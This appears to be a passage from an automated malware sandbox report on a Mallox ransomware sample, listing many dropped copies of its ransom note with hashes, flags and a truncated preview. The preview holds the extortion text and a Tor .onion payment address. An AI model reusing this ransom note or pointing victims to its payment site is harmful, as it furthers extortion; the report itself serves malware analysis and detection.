                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
